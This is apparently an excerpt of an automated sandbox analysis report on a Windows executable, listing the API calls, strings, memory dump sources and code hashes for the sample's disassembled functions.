• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: f54d6b87ac132297aeda0c4c5be5d26c88c74653801957ec4767da482e1207cc
• Instruction ID: a485fc2b3d916d84e2f8d5384e6d22183d7c8201bb1dcef623387ef5c3bb6054
• Opcode Fuzzy Hash: f54d6b87ac132297aeda0c4c5be5d26c88c74653801957ec4767da482e1207cc
• Instruction Fuzzy Hash: AF317271A40318BFEB326FA19C49F7F7E6CEB45B51F114025FA04EA1E1C6B05941ABA1
APIs
  • Part of subcall function 003787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037882B
  • Part of subcall function 003787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00378858
  • Part of subcall function 003787E1: GetLastError.KERNEL32 ref: 00378865
• _memset.LIBCMT ref: 00378353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003783A5
• CloseHandle.KERNEL32(?), ref: 003783B6
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003783CD
• GetProcessWindowStation.USER32 ref: 003783E6
• SetProcessWindowStation.USER32(00000000), ref: 003783F0
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0037840A
  • Part of subcall function 003781CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00378309), ref: 003781E0
  • Part of subcall function 003781CB: CloseHandle.KERNEL32(?,?,00378309), ref: 003781F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: 510644b2668f68fda8fb5a476c7a19d0f2cf14110e77684c6c779423660fbd70
• Instruction ID: 92f324a77aefad9e7875101c6eaa45cdc477691865ccd93460c0a19db64e6b43
• Opcode Fuzzy Hash: 510644b2668f68fda8fb5a476c7a19d0f2cf14110e77684c6c779423660fbd70
• Instruction Fuzzy Hash: 1C819D71940209AFDF22DFA4CC49AFE7BB9FF05314F148169F918A6261DB398E14DB20
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038C78D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038C7E1
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038C806
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038C81D
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0038C844
                                                                                                                    • __swprintf.LIBCMT ref: 0038C890
                                                                                                                    • __swprintf.LIBCMT ref: 0038C8D3
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • __swprintf.LIBCMT ref: 0038C927
                                                                                                                      • Part of subcall function 00343698: __woutput_l.LIBCMT ref: 003436F1
                                                                                                                    • __swprintf.LIBCMT ref: 0038C975
                                                                                                                      • Part of subcall function 00343698: __flsbuf.LIBCMT ref: 00343713
                                                                                                                      • Part of subcall function 00343698: __flsbuf.LIBCMT ref: 0034372B
                                                                                                                    • __swprintf.LIBCMT ref: 0038C9C4
                                                                                                                    • __swprintf.LIBCMT ref: 0038CA13
                                                                                                                    • __swprintf.LIBCMT ref: 0038CA62
                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3953360268-2428617273
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0038EFB6
• _wcscmp.LIBCMT ref: 0038EFCB
• _wcscmp.LIBCMT ref: 0038EFE2
• GetFileAttributesW.KERNEL32(?), ref: 0038EFF4
• SetFileAttributesW.KERNEL32(?,?), ref: 0038F00E
• FindNextFileW.KERNEL32(00000000,?), ref: 0038F026
• FindClose.KERNEL32(00000000), ref: 0038F031
• FindFirstFileW.KERNEL32(*.*,?), ref: 0038F04D
• _wcscmp.LIBCMT ref: 0038F074
• _wcscmp.LIBCMT ref: 0038F08B
• SetCurrentDirectoryW.KERNEL32(?), ref: 0038F09D
• SetCurrentDirectoryW.KERNEL32(003D8920), ref: 0038F0BB
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0038F0C5
• FindClose.KERNEL32(00000000), ref: 0038F0D2
• FindClose.KERNEL32(00000000), ref: 0038F0E4
Strings
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A0953
• RegCreateKeyExW.ADVAPI32(?,?,00000000,003AF910,00000000,?,00000000,?,?), ref: 003A09C1
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003A0A09
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003A0A92
• RegCloseKey.ADVAPI32(?), ref: 003A0DB2
• RegCloseKey.ADVAPI32(00000000), ref: 003A0DBF
Strings
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
Strings
Similarity
• API ID:
• String ID: 0D<$0E<$0F<$3c3$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG<$_3
• API String ID: 0-562281520
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0038F113
• _wcscmp.LIBCMT ref: 0038F128
• _wcscmp.LIBCMT ref: 0038F13F
  • Part of subcall function 00384385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003843A0
• FindNextFileW.KERNEL32(00000000,?), ref: 0038F16E
• FindClose.KERNEL32(00000000), ref: 0038F179
• FindFirstFileW.KERNEL32(*.*,?), ref: 0038F195
• _wcscmp.LIBCMT ref: 0038F1BC
• _wcscmp.LIBCMT ref: 0038F1D3
• SetCurrentDirectoryW.KERNEL32(?), ref: 0038F1E5
• SetCurrentDirectoryW.KERNEL32(003D8920), ref: 0038F203
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0038F20D
• FindClose.KERNEL32(00000000), ref: 0038F21A
• FindClose.KERNEL32(00000000), ref: 0038F22C
Strings
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038A20F
• __swprintf.LIBCMT ref: 0038A231
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0038A26E
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0038A293
• _memset.LIBCMT ref: 0038A2B2
• _wcsncpy.LIBCMT ref: 0038A2EE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0038A323
• CloseHandle.KERNEL32(00000000), ref: 0038A32E
• RemoveDirectoryW.KERNEL32(?), ref: 0038A337
• CloseHandle.KERNEL32(00000000), ref: 0038A341
Strings
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
APIs
• GetKeyboardState.USER32(?), ref: 00380097
• SetKeyboardState.USER32(?), ref: 00380102
• GetAsyncKeyState.USER32(000000A0), ref: 00380122
• GetKeyState.USER32(000000A0), ref: 00380139
• GetAsyncKeyState.USER32(000000A1), ref: 00380168
• GetKeyState.USER32(000000A1), ref: 00380179
• GetAsyncKeyState.USER32(00000011), ref: 003801A5
• GetKeyState.USER32(00000011), ref: 003801B3
• GetAsyncKeyState.USER32(00000012), ref: 003801DC
• GetKeyState.USER32(00000012), ref: 003801EA
• GetAsyncKeyState.USER32(0000005B), ref: 00380213
• GetKeyState.USER32(0000005B), ref: 00380221
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
  • Part of subcall function 003A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039FDAD,?,?), ref: 003A0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A04AC
  • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
  • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003A054B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003A05E3
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003A0822
• RegCloseKey.ADVAPI32(00000000), ref: 003A082F
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
APIs
  • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
  • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
• CoInitialize.OLE32 ref: 00398403
• CoUninitialize.OLE32 ref: 0039840E
• CoCreateInstance.OLE32(?,00000000,00000017,003B2BEC,?), ref: 0039846E
• IIDFromString.OLE32(?,?), ref: 003984E1
• VariantInit.OLEAUT32(?), ref: 0039857B
• VariantClear.OLEAUT32(?), ref: 003985DC
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
  • Part of subcall function 00384A31: GetFileAttributesW.KERNEL32(?,0038370B), ref: 00384A32
• FindFirstFileW.KERNEL32(?,?), ref: 003838A3
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0038394B
• MoveFileW.KERNEL32(?,?), ref: 0038395E
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0038397B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0038399D
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 003839B9
Strings
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
APIs
  • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0038F440
• Sleep.KERNEL32(0000000A), ref: 0038F470
• _wcscmp.LIBCMT ref: 0038F484
• _wcscmp.LIBCMT ref: 0038F49F
• FindNextFileW.KERNEL32(?,?), ref: 0038F53D
• FindClose.KERNEL32(00000000), ref: 0038F553
Strings
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
Strings
Similarity
• API ID: __itow__swprintf
• String ID: 3c3$_3
• API String ID: 674341424-176681986
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
  • Part of subcall function 00384A31: GetFileAttributesW.KERNEL32(?,0038370B), ref: 00384A32
• FindFirstFileW.KERNEL32(?,?), ref: 00383B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00383BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00383BEA
• FindClose.KERNEL32(00000000), ref: 00383C01
• FindClose.KERNEL32(00000000), ref: 00383C0A
Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
APIs
  • Part of subcall function 003787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037882B
  • Part of subcall function 003787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00378858
  • Part of subcall function 003787E1: GetLastError.KERNEL32 ref: 00378865
• ExitWindowsEx.USER32(?,00000000), ref: 003851F9
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003962DC
• WSAGetLastError.WSOCK32(00000000), ref: 003962EB
• bind.WSOCK32(00000000,?,00000010), ref: 00396307
• listen.WSOCK32(00000000,00000005), ref: 00396316
• WSAGetLastError.WSOCK32(00000000), ref: 00396330
• closesocket.WSOCK32(00000000,00000000), ref: 00396344
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
APIs
  • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
  • Part of subcall function 00340DB6: __CxxThrowException@8.LIBCMT ref: 00340E01
• _memmove.LIBCMT ref: 00370258
• _memmove.LIBCMT ref: 0037036D
• _memmove.LIBCMT ref: 00370414
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
APIs
  • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 003219FA
• GetSysColor.USER32(0000000F), ref: 00321A4E
• SetBkColor.GDI32(?,00000000), ref: 00321A61
  • Part of subcall function 00321290: DefDlgProcW.USER32(?,00000020,?), ref: 003212D8
Similarity
• API ID: ColorProc$LongWindow
• String ID:
APIs
  • Part of subcall function 00397D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00397DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0039679E
• WSAGetLastError.WSOCK32(00000000), ref: 003967C7
• bind.WSOCK32(00000000,?,00000010), ref: 00396800
• WSAGetLastError.WSOCK32(00000000), ref: 0039680D
• closesocket.WSOCK32(00000000,00000000), ref: 00396821
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003780C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003780CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003780D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003780E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003780F6
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00324AD0), ref: 00324B45
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00324B57
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    • Opcode ID: 7d477ecd50130ab47e8c138a8defb089d2b223ec8a025bc2203b2b725992f2b0
                                                                                                                    • Instruction ID: 48350dacac03aecada456da4afc8555432a1911895bad8e3afaf339c9d14c29f
                                                                                                                    • Opcode Fuzzy Hash: 7d477ecd50130ab47e8c138a8defb089d2b223ec8a025bc2203b2b725992f2b0
                                                                                                                    • Instruction Fuzzy Hash: BDD01234A10723CFDB229FB1E858B4676E8AF06351F118839D4C6D6150D670D480CA64
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0039EE3D
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0039EE4B
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0039EF0B
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0039EF1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2576544623-0
                                                                                                                    • Opcode ID: 2acadb4dd35d9e866d148d08aae40bcda7933016c7deebec0c723d06d0d1c18f
                                                                                                                    • Instruction ID: 99037cf0c2db570b946ea9585ece03329b2028af9e9f9429b5e93001e324c097
                                                                                                                    • Opcode Fuzzy Hash: 2acadb4dd35d9e866d148d08aae40bcda7933016c7deebec0c723d06d0d1c18f
                                                                                                                    • Instruction Fuzzy Hash: 16517E71504311AFD712EF24DC81E6BB7E8FF95710F50482DF5959B2A2EB70A908CB92
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0037E628
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen
                                                                                                                    • String ID: ($|
                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                    • Opcode ID: fee8bedf99fcc958b1901fdc38a14614ce0f78af72ff030bb2838c19b5b60530
                                                                                                                    • Instruction ID: a4865fb11ea87026c77d9878af6ed8742fb1d880f748bde6487d7ccbde43b6e0
                                                                                                                    • Opcode Fuzzy Hash: fee8bedf99fcc958b1901fdc38a14614ce0f78af72ff030bb2838c19b5b60530
                                                                                                                    • Instruction Fuzzy Hash: 19323675A007059FD729CF29C48196AB7F1FF48310B15C4AEE89ADB7A1E774E941CB40
                                                                                                                    APIs
                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0039180A,00000000), ref: 003923E1
                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00392418
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 599397726-0
                                                                                                                    • Opcode ID: 82d003d872ab622a7b2f32fc528f25d63903af3213da83d8fc4996d81ca229e6
                                                                                                                    • Instruction ID: 5e3699359d595ab083979fe1d8f1550879034c10f2d9d9736706c8f72eaea773
                                                                                                                    • Opcode Fuzzy Hash: 82d003d872ab622a7b2f32fc528f25d63903af3213da83d8fc4996d81ca229e6
                                                                                                                    • Instruction Fuzzy Hash: CA41F575A04A09FFEF12DE96DCC1FBBB7FCEB40314F10402AF641AA141DA75AE419A60
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038B343
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0038B39D
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0038B3EA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1682464887-0
                                                                                                                    • Opcode ID: 419edd0c34dd6a372852c6f9284aa072d09c3a3d4d102b0912e41a48ddea549f
                                                                                                                    • Instruction ID: a56183dec17259800c18f3d29d5f880e2d99c3ed97a29e427a4cc802fc1dbb01
                                                                                                                    • Opcode Fuzzy Hash: 419edd0c34dd6a372852c6f9284aa072d09c3a3d4d102b0912e41a48ddea549f
                                                                                                                    • Instruction Fuzzy Hash: AC217135A00618EFCB01EFA5E881AEDFBB8FF49310F1480AAE905AB351CB319915CB50
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
                                                                                                                      • Part of subcall function 00340DB6: __CxxThrowException@8.LIBCMT ref: 00340E01
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037882B
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00378858
                                                                                                                    • GetLastError.KERNEL32 ref: 00378865
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1922334811-0
                                                                                                                    • Opcode ID: 0cc55142a6878359346d6d96c3702b32da21c694d818b1cadea090940ba0ba2a
                                                                                                                    • Instruction ID: 7461ba0ac5baed47c981690b72f701128ec1c253a6109c18f8591f8d207c080e
                                                                                                                    • Opcode Fuzzy Hash: 0cc55142a6878359346d6d96c3702b32da21c694d818b1cadea090940ba0ba2a
                                                                                                                    • Instruction Fuzzy Hash: 3C116DB2914204AFE729DFA4DC89D6BB7FCFB45711B20852EE45997241EA34BC408B60
                                                                                                                    APIs
                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00378774
                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0037878B
                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0037879B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    • Opcode ID: b146d346656402bd1b7f21aad43fb2befc6eefa212c049c5875630fc37174e6c
